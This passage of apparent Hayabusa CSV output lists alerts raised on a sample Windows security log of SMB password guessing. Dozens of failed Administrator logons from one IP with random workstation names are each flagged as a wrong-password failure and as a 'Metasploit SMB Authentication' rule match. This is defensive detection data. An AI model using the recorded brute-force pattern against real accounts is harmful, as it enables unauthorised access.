Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 